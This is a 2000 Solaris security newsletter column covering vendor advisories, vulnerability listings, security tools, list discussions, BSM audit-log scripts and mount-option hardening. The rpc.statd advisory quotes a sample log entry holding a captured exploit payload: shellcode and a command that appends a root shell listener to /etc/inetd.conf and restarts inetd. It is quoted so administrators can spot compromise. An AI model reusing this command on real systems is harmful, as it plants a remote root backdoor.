By Seán Boran (sean AT boran.com) for SecurityPortal
Contents:
• Advisories and Security Bulletins
• News
• Security Tools
• Mailing Lists
• Tip of the week #0, #1, #2, #3, #4
A bug surfaced in PGP regarding the use of ADKs (additional decryption keys, used for key recovery). This affects Windows PGP, but not UNIX versions like 2.6.3i, 5.0i and gnupg 1.0.1.
See also:
http://www.cert.org/advisories/CA-2000-18.html
http://cryptome.org/pgp-badbug.htm
http://www.securityfocus.com/vdb/bottom.html?vid=1606Bulletin Number: #00197 Java Web Server
Sun announces the release of patches for Java Web Server 2.0 and 1.1.3 which relate to a vulnerability with the administration module and recommends that they be installed immediately on systems running Java Web Server.
Patches are available at:
http://java.sun.com/products/java-server/jws113patch3.html http://java.sun.com/products/java-server/jws20patch3.htmlCERT announced Advisory CA-2000-17 "Input Validation Problem in rpc.statd":
The rpc.statd program passes user-supplied data to the syslog() function as a format string. If there is no input validation of this string, a malicious user can inject machine code to be executed with the privileges of the rpc.statd process, typically root.
There is no mention of Solaris being vulnerable or not, therefore it is suggested to look in logs for entries like the following:pc.statd[410]: SM_MON request for hostname containing '/': ^D^D^E^E^F ^F^G^G08049f10 bffff754 000028f8 4d5f4d53 72204e4f 65757165 66207473 6820726f 6e74736f 20656d61 746e6f63 696e6961 2720676e203a272f.............0000000000000bffff707<90><90>.............<90>K^<89>v<83> <8D>^( <83> <89>^<83> <8D>^.<83> <83> <83>#<89>^ 1<83> <88>F'<88>F*<83> <88>F<89>F+, <89><8D>N<8D>V<80>1<89>@<80>/bin /sh -c echo 9704 stream tcp nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd
Relevant links:
http://www.cert.org/advisories/CA-2000-17.html
http://www.securityfocus.com/bid/1480
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0666Sun bulletin #00196 announces the release of a new version of AnswerBook2 and patches which relate to security flaws in the http server included with AnswerBook2. AnswerBook2 uses a http server, it has weaknesses in versions prior to v1.4.2 that could lead to remote exploits. To fix, two actions are needed
- Update Answerbook to v1.4.2 or later
- Install patches; for the SPARC architecture 110011-02 or Intel x86 110012-02.
Sun bulletin #00195 announces patches for the libprint.so.2 and /usr/lib/lp/bin/netpr vulnerabilities presented on Bugtraq in June. The vulnerability may allow a local user to gain root access. The patches needed are:
SunOS 5.8 109320-01 SunOS 5.8_x86 109321-01
SunOS 5.7 107115-05 SunOS 5.7_x86 107115-05
SunOS 5.6 106235-06 SunOS 5.6_x86 106236-06
2000-08-22: Sun Java Web Server Web Admin / Bulletin Board Vulnerability
The severe problems noted a few weeks ago now have patches, see also the Sun bulletin above.
2000-08-08: Solaris AnswerBook2 Administration Interface Access Vulnerability
2000-08-07: Solaris AnswerBook2 Remote Command Execution Vulnerability
2000-08-29: GWScripts News Publisher author.file Write Vulnerability
2000-08-29: Helix Code "go-gnome" /tmp Symlink Vulnerability
2000-08-28: Kerberos KDC Spoofing Vulnerability
2000-08-25: Multiple Vendor mgetty Symbolic Link Traversal Vulnerability
2000-08-23: CGI Script Center Account Manager LITE / PRO Administrative Password Alteration Vulnerability
Regardless of privilege level, any remote user can modify the administrative password for CGI Script Centers' Account Manager.
2000-08-23: CGI Script Center Subscribe Me LITE Administrative Password Alteration Vulnerability
Fix: update to new version from http://www.cgiscriptcenter.com/subscribe/
2000-08-22: ISS RealSecure 3.2.x Fragmented SYN Packets DoS Vulnerability
On Solaris, the process crashes, all detection stops, and a report is generated to the console. Also, on Solaris it is possible to crash the process with a flood of unfragmented packets if certain flags (in addition to SYN) are set.
2000-08-20: UMN Gopherd 2.x Halidate Function Buffer Overflow Vulnerability
2000-08-17: Netwin Netauth Directory Traversal Vulnerability
2000-08-15: BEA Weblogic Proxy Multiple Buffer Overflow Vulnerabilities
Fix: Upgrade to service pack 5.
2000-08-14: ntop -w Buffer Overflow Vulnerability
Workaround: remove the setuid bit and don't execute ntop as root.
2000-08-08: Multiple Vendor mopd Buffer Overflow Vulnerability
2000-08-08: Multiple Vendor mopd User Inputted Data Used as Format String Vulnerability
2000-08-07: SuidPerl Mail Shell Escape Vulnerability
If you use Perl for SUID scripts, an upgrade to the next release of perl will be needed. For now, removing the SUID bit from suidperl/sperl is advised.
2000-08-04: PCCS Mysql Database Admin Tool Username/Password Exposure Vulnerability
2000-08-03: Netscape Listening Socket Vulnerability
2000-08-03: Netscape Communicator URL Read Vulnerability
All versions of Netscape Navigator/Communicator up to 4.74 are vulnerable to a Java bug that enables a hostile web site to start a server process on the client, giving it full access to the client's files.
2000-08-02: Check Point Firewall-1 Unauthorized RSH/REXEC Connection Vulnerability
2000-08-02: Linux ntop Unauthorized File Retrieval Vulnerability
2000-08-01: GNU Mailman Local Format String Stack Overwrite Vulnerability
2000-07-31: Weblogic SSIServlet Show Code Vulnerability
2000-07-31: Weblogic FileServlet Show Code Vulnerability
2000-07-30: Bajie Webserver Absolute Path Disclosure Vulnerability
2000-07-30: Bajie Webserver File Reading Vulnerability
2000-07-28: CVS Client Server-Instructed File Create Vulnerability
2000-07-28: CVS Checkin.prog Binary Execution Vulnerability
2000-07-27: OpenLDAP 'ud' Group Writable Vulnerability
Infosec Outlook August 2000 Volume 1, Issue 5 is a joint monthly publication of the Information Technology Association of America (ITAA) and CERT. In this issue:
• How the FBI Investigates Computer Crime
• Infosec Experts: Carnivore Bite Too Big?
• Finger Pointing on Cyber Liability
• The IDS Life Cycle
How to perform a secure remote backup over an insecure network, by Aviel D. Rubin
Backups: you might be able to steal data for only a six-pack of beer.... backup tools and their encryption facilities are examined.
Stupid, Stupid Protocols: Telnet, FTP, rsh/rcp/rlogin, by Jay Beale
More on SSH, in particular using RSA auth for users.Interview With Jean Chouanard, YASSP Lead Developer, by Seán Boran
Audits, Assessments & Tests (Oh, My), by Al Berg
On the surface, all vulnerability assessment scanners perform essentially the same way. Here's how to decide which one-if any-is right for your requirements (Part 2 of 4).
This is a well-written article for anyone who has to review Network Security Scanners.
Authentication: Patterns of Trust, by Rick Smith
There are plenty of options for user authentication, but none is a "one-size-fits-all" solution. With so many available technologies, how do you select the right one for your organization's needs?
Access Control: Beyond Firewalls, by Stephen D. Reed
In most organizations, firewalls are now a commodity: everyone has at least one. In the future, access controls will need to become more granular, all the way down to the data level.
The truth about security, by Jascon Fink
Meet PAM: Authenticating Users on an Open Source System, by Scott Mann
Pluggable authentication modules (PAM) were originally developed by Sun Microsystems and released as an undocumented feature in Solaris 2.3. Since then, Sun has done little with PAM, compared to the open source community, and most specifically, the Linux community. In this article, we will explore the general role of Linux-PAM, its components, configuration and a few general examples of its use.
Although the focus in on Linux, this is the best article on PAM that I've seen so far.Role Based Access Control, by Hal Flynn
In an attempt to add a finer grain of control to privileges, Sun implemented the Role Based Access Control system in Solaris 8. As clever solution to a large problem, Sun has implemented a facility that allows the customizing of privilege for each individual user. The distribution of power can now allow users access to resources previously not possible without giving them root access to the system. Hal Flynn sets forth background information for a series of articles discussing this relatively new technology, that will be useful to users at a wide variety of levels who are looking in to implementing RBAC on their systems.
The fields in the /etc/group, /etc/passwd and /etc/shadow is explained along with ACLS. The actual discussion of RBAC is planned for next week.Introduction to IP Filter Part 2, by Jeremy Rauch
Too often, machines are compromised due to services running that are unneeded, or unnoticed. Many times, services are started that an administrator thought they disabled, or a service is accidentally re-enabled during patching. There is no substitute for properly locking down machine, but sometimes things slip through the cracks.
IP Filter can be a fairly complex and intimidating piece of software for people to configure properly. In this article, the second of two parts, we'll talk about using IP NAT, as well as applying some more "advanced" features of IP Filter to building a firewall.
Solaris Data Encryption Supplemental CD Download delivery
The software previously contained on the Solaris Data Encryption Supplemental CD (SOLZ9-080N9999) is being repriced from $100 to no charge (via web download) and will now be offered via download to all countries except Russia, Israel and nations embargoed by the U.S. government and Burma as per Sun policy.
This sounds like exactly what International customers have been waiting for! I was unable to find out how to download it though, I'll follow up next week.Secure Enterprise Computing with the Solaris 8 Operating Environment
This whitepaper presents some of Solaris 8's security features:
• The IPsec implementation (for VPNs), noting for instance, that only manual key exchange is implemented and only 56bit DES is available for payload encryption to International users.
• Strong authentication: Pluggable Authentication Module - PAM, Smart card, Kerberos client/server.
• Role-Based Access Control: Privileges that are managed with RBAC include serial port, file, log, and printer management, user login control, and system shutdown...... Role-based access control is implemented using roles and attributes; once a user is logged in, they can assume roles that have been made available to them through the use of role-aware shells
• Access Control ListsA list of Sun's security whitepapers is available at:
Trusted Solaris 7 FAQ
http://www.sun.com/software/white-papers/#securityThe following 'blueprints' from Sun may be of interest, updates are to be expected in the coming months:
• Solaris Operating Environment Security: Discusses how to enhance system and network service security in Solaris.
• Solaris Operating Environment Network Settings for Security: Discusses the many low-level network options available within Solaris and their affect on security.
• Solaris Minimization for Security: A Simple, Reproducible and Secure Application Installation Methodology: Discusses OS minimization as a technique for reducing system vulnerabilities; a simple method for duplicating these installations on large numbers of servers is also introduced
• JumpStart Architecture and Security Scripts for the Solaris Operating Environment Part 1: This article is part one of a three part series presenting the JumpStart Architecture and Security Scripts tool (Toolkit) for Solaris. The Toolkit is a set of scripts which automatically harden and minimize Solaris Operating Environment systems. The modifications made are based on the recommendations made in the previously published Sun blueprints online security articles.PatchPro Expert: Patch Automation for Sun Storage
An Introduction To Live Upgrade
Running logcheck, the logfile auditing software for Unix (see also my improved logcheck.sh)
PAM - Pluggable Authentication Modules, by Kurt Seifried
Snort
• 08292k.rules released. This file has been broken out into sections for each rule type, rather than the way it use to ship.
• Snort Survey Database Online. If you use snort, take a moment to fill this out.
• snortrpt.pl generates an IDS report for those using the Win32 port of snort. It extracts alerts from the EventLog, and then performs a quick stealth scan and os ID scan of the 'offending' IP addresses, using eEye Security's nmapNT.
• A new release of dupl.pl is out, which allow merging of rules files without duplicating rules.
• Snort RPMs for snort, Solaris packages and a chroot'ed snort are in the files section.
• The snort2bb.pl program is designed to monitor snort output and send the results to the Big Brother network monitor
• snortstart 0.14 by zas, is a bash script to install, start and stop snort in a chroot jail under unprivileged user and group. Not tested yet.
• 07272k.rules has been released
• Snort Installation and Basic Usage Part IITCT (The Coroner's Toolkit)
• An Introduction to TCT is a brief documentation of TCT.
• v1.02 released. This patch fixes a few bugs in the mactime utility, and makes the ils and ils2mac utilities more useful for exploring the inodes of deleted files.
• Computer Forensics Column, By Dan Farmer and Wietse Venema
I had problems with v1.01 trying to analyse unmounted cdroms and hanging, haven't tried v1.02 yet.
• v1.01 released. TCT is a collection of programs for a post-mortem analysis of a UNIX/Linux system after a break-in.
• Forensic Computer Analysis: An Introduction, By Dan Farmer and Wietse VenemaSAINT - v 2.1.3 by World Wide Digital Security, Inc., is a security assessment tool based on Satan. New in this version:
• Check for IRIX telnetd format string vulnerability
• Check for buffer overflow in gopher
• Check for vulnerability in SUN AnswerBook2 (detected only at heavy-plus scanning level)
• Check for wais.pl
• Check for PCCS MySQL Database Admin Tool (dbconnect.inc)
• Modified heavy scan to avoid crashing PC Duo (thanks to Daniel Curry)
Some documents on Saint:
• Vulnerabilities detected by Saint, CVEs detected by SAINT.Nessus 1.0.4 released.
Ngrep 1.38 released.
Nmap
• Intrusion Detection Level Analysis of Nmap and Queso, by Toby Miller
• 2.54BETA2 is out, last stable release is Nmap 2.53SSH
• Secure FTP 0.9.6 by Brian Wellington, implements a file transfer protocol using ssh/rsh as the transport mechanism.
• Commercial SSH2 has been upgraded to 2.30OpenCA v0.6 pre-release available.
FreeVeracity: New Free Intrusion Detection Tool for Free Platforms - FreeVeracity is a general-purpose data integrity tool for free platforms (e.g. GNU/Linux, FreeBSD, NetBSD, OpenBSD) that uses cryptographic hashes to detect changes in files. FreeVeracity can be deployed in a wide variety of applications including network intrusion detection and firewall monitoring. By installing FreeVeracity integrity servers on your computers, you can actively monitor the integrity of your entire network.
The bad news is, it's not free for Solaris. It was not clear how much it costs for Solaris either.Talisker's Intrusion Detection Systems is an interesting site with a well laid out list of IDS tools and links to reviews, coupled with advice and amusing cartoons.
html-trap.procmail v1.117 released.
Procmail snippet to defang active-content HTML tags to protect those people foolish enough to read their mail from a web browser or HTML-enabled mail client. Also mangles the attachment name on executable attachments to prevent attacks, at the cost of not being able to run programs from within your mail client - which you shouldn't do anyway. Also protects against excessively long filenames in attachments, which can cause nasty things to happen in some clients, and excessively long MIME headers, which may crash or allow exploits of some clients.Automated Password Generator (APG) v1.0.3
• Can run in standalone or client/server mode
• Built-in ANSI X9.17 RNG (Random Number Generator)
• Built-in password quality checking system
• Two Password Generation Algorithms, Pronounceable and Random.
• Configurable password length, mount of generated passwords parameters
• Ability to initialize RNG with user string
• Ability to log password generation requests for network version
• Ability to control APG service access using tcpd
• Ability to use password generation service from any type of box (Mac, WinXX, etc.) that connected to network
• Ability to enforce remote users to use only allowed type of password generationWhisker 1.4 by rain forest puppy, is a CGI vulnerability scanner. It is scriptable and has many features, such as querying for system type and basing scans on the information gathered (ie, determining between IIS and Apache webservers).
Claymore 0.2 by Sam Carter, is an intrusion detection, and integrity monitoring system. It reads in a list of files stored in flat ASCII, and uses md5sum to check their integrity against that recorded earlier in a database. If the database is placed on a read-only medium such as a write-protected floppy, then it should provide an infallible record against remotely installed trojan horses.
Note: I've not tried this, but it sounds like a Tripwire alternative.SAINT - v 2.1.2 by World Wide Digital Security, Inc., is a security assessment tool based on SATAN. .... This release adds vulnerability checks for setproctitle vulnerability in ftpd (added checks for HP-UX, OpenBSD, and ProFTP), Linux statd format string vulnerability, Big Brother (two vulnerabilities), Apache::ASP (source.asp), Poll It, guestbook.cgi, Excite for Web Servers, OmniHTTPD (imagemap.exe), Mini SQL (w3-msql), and the AltaVista search engine.
Note: 'Sara', mentioned last week, is a Saint derivative. It is not clear to me which of the two is the most useful, or whether it is intended to merge the best of both these Satan derivatives at a later stage. Sara seemed slow.
nPULSE 0.2 by Dr. Steven Horsburgh
nPULSE is a web-based network monitoring package for Unix-like operating systems. It can quickly monitor tens, hundreds, even thousands of sites/devices at a time on multiple ports. nPULSE is written in Perl and comes with its own mini web server for extra security.Automated Password Generator (APG) 1.0.4 by Adel I. Mirzazhanov
APG (Automated Password Generator) is a tool set for random password generationSamhain 0.9.2, by Rainer Wichmann
Samhain is a file system integrity checker that can optionally be used as a client/server
application for centralized monitoring of networked hosts. Databases and configuration files can
be stored on the server. In addition to forwarding reports to the log server via authenticated
TCP/IP connections, several other logging facilities (e-mail, console, tamper-resistant log file,
and syslog) are available. Samhain has been tested on Linux, AIX 4.1, HP-UX 10.20, Unixware
7.1.0, and Solaris 2.6.XOR Cipher Analyzer 0.2 by Marvin,
XOR-analyze is a program for cryptanalyzing (breaking) one of the most easily-breakable ciphers. It works with variable key lengths and includes an encryption/decryption program.MIME Defanger 0.4 by David F. Skoll
MIME Defanger is an e-mail filter program which works with Sendmail 8.10. MIME Defanger filters all e-mail messages sent via SMTP. MIME Defanger splits multi-part MIME messages into their components and potentially deletes or modifies the various parts. It then reassembles the parts back into an e-mail message and sends it on its way. Mail filter can more reliably determine attachment names, and extra logging via syslog.NetSaint 0.0.6b5 beta by Ethan Galstad
NetSaint is a program that will monitor hosts and services on your network. It has the ability to email or page you when a problem arises and when a problem is resolved. Several CGI programs are included in order to allow you to view the current service status, problem history, notification history, and log file via the web.Cryptix 3 is a cleanroom implementation of Sun's Java Cryptography Extensions (JCE) version 1.1. In addition to that it contains the Cryptix Provider which delivers a wide range of algorithms and support for PGP 2.x. Cryptix 3 runs on both JDK 1.1 and JDK 1.2 (Java 2).
This really is a useful toolkit, I've used and can recommend it.
08/31/00 Limiting write access to a port
08/30/00 nisd_resolv issues
08/21/00 Promiscuous flag under Solaris.
08/21/00 TCP Wrapper configuration
08/20/00 SKey on Solaris?
08/18/00 Issues with backing up with ufsdump
08/17/00 Promiscuous flag under Solaris
08/17/00 statd log file entry
08/17/00 Shell Q
08/17/00 Proposed Solaris Rootshell FAQ
08/17/00 FOCUS-SUN Digest - 15 Aug 2000 to 16 Aug 2000 (#2000-108)
08/15/00 vipw (was Re: Shell Q)
08/15/00 FW: Dan & Wietse's Forensics Tools released
08/14/00 anti-virus software
08/14/00 Shell Q
08/11/00 password history for Solaris
08/13/00 hardware address Thread1, Thread2
08/12/00 in.dhcpd
08/11/00 password history for Solaris
08/10/00 Solaris FTPd Capabilities
08/09/00 Syslogd accepting messages from everyone?
08/07/00 recently on bugtraq... [Re: Identifying SUN Solaris Machines using ICMP Address MaskRequests with a little twist] Thread1, Thread2, Thread3
08/07/00 perl -vs- firewalls (was: Dan & Wietse's Forensics Too ls released) Thread1, Thread2, Thread3, Thread4, Thread5
08/06/00 sendmail error message question
08/05/00 Quick sendmail question
08/04/00 Trusted solaris
08/04/00 Shell script to binary compiler
08/03/00 Installing apps/utils as usr or root
08/02/00 Sun Security Bulletin #00195 (fwd)
08/02/00 FW: Dan & Wietse's Forensics Tools released
08/01/00 Syslogd accepting messages from everyone?
07/31/00 Solaris8 eye opener
07/28/00 sendmail Thread1 Thread2 Thread3
07/28/00 Root gid change to zero, and SMTP uid of 0, gid of 0: Thread1 Thread2 Thread3 Thread4 Thread5 Thread6
07/27/00 Potential problem (and solution) with FW-1 SP2 upgrades
07/25/00 SUNWski
License approval issues are holding up the next beta. Drafts of the post install doc, ToDo and faq have been updated. Significant work on reviewing, improving and documenting "tocsin" for inclusion in Yassp. A bug was noted in /etc/hosts.allow. Discussions on ideas to include new binaries for md5 and tocsin, automated patch scripts and disabling SUID files.
Discussion threads:
• tocsin package ready
• tocsin update
• tocsin tests
• Additional binaries for yassp
• email archives
• pwd: cannot determine current directory!
• FW-1 on Sol 7
• tocsin manual page
• hosts.allow-Dist
• tocsin package pref q
• tocsin
• SUID files
• Portscan detection
• BIND variable in yassp.conf
• md5
• package / binary and reverse map
• Re: Only allow root to access some files?
• RE: Reg's patch scripts
Re: Only allow root to access some files?
Post install doc #4
Re: Yassp Post installation doc (email server)
Questions on clean_passwd
Mods to /etc/profile
Re: install yet another package
Re: Yassp Post installation doc update #2
Re: packaging Q
Re: Yassp Post installation doc update #3
Reg's patch scripts
Problems running CDE as non root user?
Reg's patch scripts
Yassp Post installation doc update #3
Problems running CDE as non root user?
packaging Q
nsyslog or ssyslog?
site editing
Yassp Post installation doc update #2
Improving "daily"
Yassp Post installation doc update
Re: Beta#11 feedbackSee also: Main site, DL archive, Interview With Jean Chouanard, Draft dev. doc.
Advanced Research Corporation are providing free updates to Satan and Tiger, two old but useful auditing tools.
The Security Auditor's Research Assistant (SARA) is an updated version of the venerable SATAN network auditing tool:
- CVE standards support
- Enterprise-level search module
- Standalone or daemon mode
- Free-use open license
- Updated twice a month
- User extension support
Satan was a useful tool, with a good user interface, but it was not updated except for the Saint derivative. Bob Todd, the SAINT author, has been working on SARA since 1999. Some useful features in SARA include integrated support for nmap, samba and DDoS tools. A report writer for pretty summary reports is also available.
Tests show that it works on Solaris 8 and OpenBSD.
- It needs a web browser, but lynx is acceptable as well as the GUI browsers
(configured in config/paths.pl). For Netscape I had to change the '.pl' handling as noted
in the FAQ.
- I did have frequent errors like "Initialization in progress, SARA is initializing,
please try again later" when using lynx.
- The 'html/docs' subdirectory contains detailed HTML documentation, it's worth a read
first.
- Start with the '-n' option to integrate nmap.
- Do NOT scan production systems unless you know exactly what you are doing, Sara (like
Satan before it) can cause servers to have hung sessions etc. especially with older
(buggier) OS's.
Problems:
- Sara still reports a 'red' error for NFS read-only exports, something that I never
agreed with in Satan. It should be 'yellow'.
- 'Email relay problem' does not actually check if relaying works, just indicates that
sendmail is present.
- 'rstatd' suffers from the same problem.
- It is slow
TARA is an update of the 1994 'Tiger scripts' for host-based security auditing.
Since 'tiger' has not been updated since 1994, there were numerous changes made to the 'systems' directories. Output was streamlined to provide a more readable report file. Also, minor bugs in the 'scripts' directory were corrected. TARA was tested under Red Hat Version 5.x, 6.x, SGI IRIX 5.3, 6.x, and SunOS 5.x.
This also a useful update. It has a '-H' option to produce HTML output. It's worth
taking time to customise tigerrc to your needs before running it.
Problem: no signature DBs are available for newer Solaris versions.
Francisco Mancardi from U&R Consultores [fman@uyr.com.ar], who gave us the 'saveit' script five weeks back, has scripts to make it easier to read the Sun's C2 (SunShield BSM) auditing logs. The scripts and files described here can be downloaded. First we'll briefly run though setting up C2 (SunShield BSM) audit logs.
What is SunShield BSM?
Sun deliver a "C2" level auditing system for both SunOS (Sunshield) and Solaris (Sunshield BSM). It is bundled with Solaris 2. BSM allows the actions of specific users to be recorded and written to an audit file. However, the auditing is at the system-call level, meaning huge logs may be generated by simple user actions. Performance is also affected. The standard analysis tools praudit and auditreduce offer no high level analysis of audit trails. Applications may also write to the audit trail.
Reference documentation: "SunShield Basic Security Module Guide" (Standard Solaris 2.x documentation). Man pages: audit(1m), audit_startup(1m), audit_warn(1m), auditconfig(1m), auditreduce(1m), bsmconv(1m).
Enabling and configuring SunShield BSM:
Install the audit2info scripts:
Try out audit2info:
First, produce an ASCII file on C2 auditing activity :
cd /opt/audit;
auditreduce | praudit > audit-data.txtWe can now analyse this output in different ways using the "audit2info" script, links are provided to sample results.
Let's make the output from auditreduce | praudit above more readable:
./audit2info audit-data.txt > outfileShow only activity concerning one username:
./audit2info -u bill audit-data.txt > outfileShow only login/logout activity:
./audit2info -l ok audit-data.txt > outfileShow only login failure activity:
./audit2info -l ko audit-data.txt > outfileShow the complete output from auditreduce |praudit, but filtering out records
that have fields with the string listed in the filter file default "filtro_audit"
./audit2info -f default audit-data.txt > outfileThe above example can be mixed as desired..
Notes using SunShield BSM:
Implementing C2 Auditing in the Solaris Environment, by Kevin Wenchel and Stephen Michaels
http://www.sysadminmag.com/supplement/913c2.shtml
Disk mounting (vfstab options):
Several options can be set to improve the security and robustness of filesystems when they
are mounted. Run the mount command to check that filesystems options are
effective.
| Mount option | OS | Description | When to use it |
| nosuid | 2.x | Disables SUID programs, but also disables devices! | /var or /home or data disks where no SUID programs, or devices
(and hence chroot environments are used). /tmp won't work either, unless it is on disk. |
| logging | 2.7 or later | keeps a transaction log within the mounted partition. The advantage is an almost instantaneous filesystem check - which may take a considerable while with larger harddisks, e.g. 18 GB. The disadvantage is the additional time spent writing the transaction log. | /usr /opt /home Recommended for all file systems except: root (if Veritas VxVM is used), or where lots of file accesses are expected. |
| noatime | 2.7 or later | allows mounting file systems without updating inodes at each access to any file. This will significantly speed up services like web caches or news servers, which do a lot of file IO with small files. | /var or any partition where lots of file access are expected (web cache or news partitions). |
| size=100m | 2.5.1 or later | Allow /tmp to only use 100MB of swap space. The value could be set to say 30% of swap space. | /tmp |
| ro | 2.x | Read-only Mounting filesystems read-only provides only a limited protection against Trojans/attackers (if they get root, they can remount read-write), but it saves time fsck'ing when shutting down, can improve performance (access times don't need to be updated) and can prevent the sysadmin from making mistakes or help detecting mistakes (accidentally deleting files etc.). |
Mounting read-only is a major argument for maintaining
separate file systems for /usr or /opt. Note that to mount /usr read-only, /usr/local often needs to be on a different partition. |
Be very careful when editing vfstab, e.g. an error on the / or /usr lines can render the system unbootable! (If this happens, boot from cdrom in single user mode, mount the problem disk, correct vfstab and reboot). Some examples of vfstab entries are:
A simple server with only a root and /var partition, running Solaris 2.8:
fd - /dev/fd fd - no - /proc - /proc proc - no - /dev/dsk/c0t3d0s1 - - swap - no logging /dev/dsk/c0t3d0s0 /dev/rdsk/c0t3d0s0 / ufs 1 no logging /dev/dsk/c0t3d0s7 /dev/rdsk/c0t3d0s7 /var ufs 1 no logging,nosuid,noatime swap - /tmp tmpfs - yes size=100m
and on a larger server:
fd - /dev/fd fd - no - /proc - /proc proc - no - swap - /tmp tmpfs - yes size=200M /dev/dsk/c0t8d0s0 /dev/rdsk/c0t8d0s0 / ufs 1 no logging /dev/dsk/c0t8d0s1 - - swap - no - /dev/dsk/c0t8d0s4 /dev/rdsk/c0t8d0s4 /usr ufs 1 no logging /dev/dsk/c0t8d0s6 /dev/rdsk/c0t8d0s6 /var ufs 1 no nosuid,noatime,logging /dev/dsk/c0t8d0s5 /dev/rdsk/c0t8d0s5 /opt ufs 2 yes logging
Auditing the security of an existing Solaris system can be time consuming, and often requires on-site visits. There are several commercial tools and a few free ones (e.g. Titan and the Coroners Toolkit) that help, but they can be complicated and require local installation. A few weeks back we presented a small Bourne shell script for simple auditing, this has now been updated and complemented with a second script.
Purpose:
• For situations where a "quick audit" of the system is required.
• simple to run, the auditor could even give it to the sysadmin, ask him to
run it at night and send the results back to the auditor (perhaps by encrypted email).
• It's simplicity makes it easy to verify, it is not as thorough as other
tools, but it is small and easy to understand.
• This script automates the gathering of the information only, of course the
difficult part is the interpretation and deciding what countermeasures to take.
This has now developed into two scripts:
Please read the headers in the scripts before using.
Doug Hughes (Doug.Hughes@Eng.Auburn.edu) wrote tocsin a "featherweight network intrusion detection system" back in 1996. It is a free tool that listens for network scans. Tocsin only needs to be installed once per subnet, unless switches are used i.e. all nodes do not see all traffic. It uses DLPI [see note1] kernel level packet filtering and runs out of the box on SunOS and Solaris to catch port and stealth scans (SYN, FIN, ACK, Xmas, RST, etc). Alert messages are logged to syslog 'auth', startup and shutdown messages are logged to 'daemon'.
Over the last few weeks tocsin has been significantly improved and version
2.1.1.2 released:
• fixed log file permissions
• new tcp or udp options (:t or :u) per service
• ported to Solaris 8 sparc/Intel
• new common package for Solaris sparc/Intel
• change UID to nobody after binding to the network
• new man page and startup file 'S70tocsin' added
• New options: -T tcp only, -D destination network only, -O log IP options,
-I invert port matching filter conditions.
This amazing little tool (it's only 20kB) is simple, but works quite well. The new
options allow significant reduction of false positives. For this article, it was tested on
Solaris 2.7-2.8/sparc and Solaris 2.8/Intel, but it should run on Solaris 2.6 and possible
2.5.1 also.
tocsin can be downloaded in source form (tocsin.tar.gz), or a Solaris package (AUBtocsin),
from:
ftp://ftp.eng.auburn.edu/pub/doug/
Doug has done great work with tocsin, if you've been waiting for an simple but effective IDS, this is worth a look.
Note1: DLPI is the Datalink Provider Interface (a standard based on ISO 8886 and 8802 for Streams based kernel implementations of packet filtering)
If you have any security tips/scripts you'd like to share with others, contact sean AT boran.com.
For brevity, the list of resources and references is kept in a separate document:
http://www.securityportal.com/topnews/weekly/solarisref.html
Seán Boran is an IT security consultant based in Switzerland and the author of the online IT Security Cookbook.
| © Copyright 2000, SecurityPortal Inc. & Seán .Boran, All Rights Reserved, Last Update: 10 November, 2000 |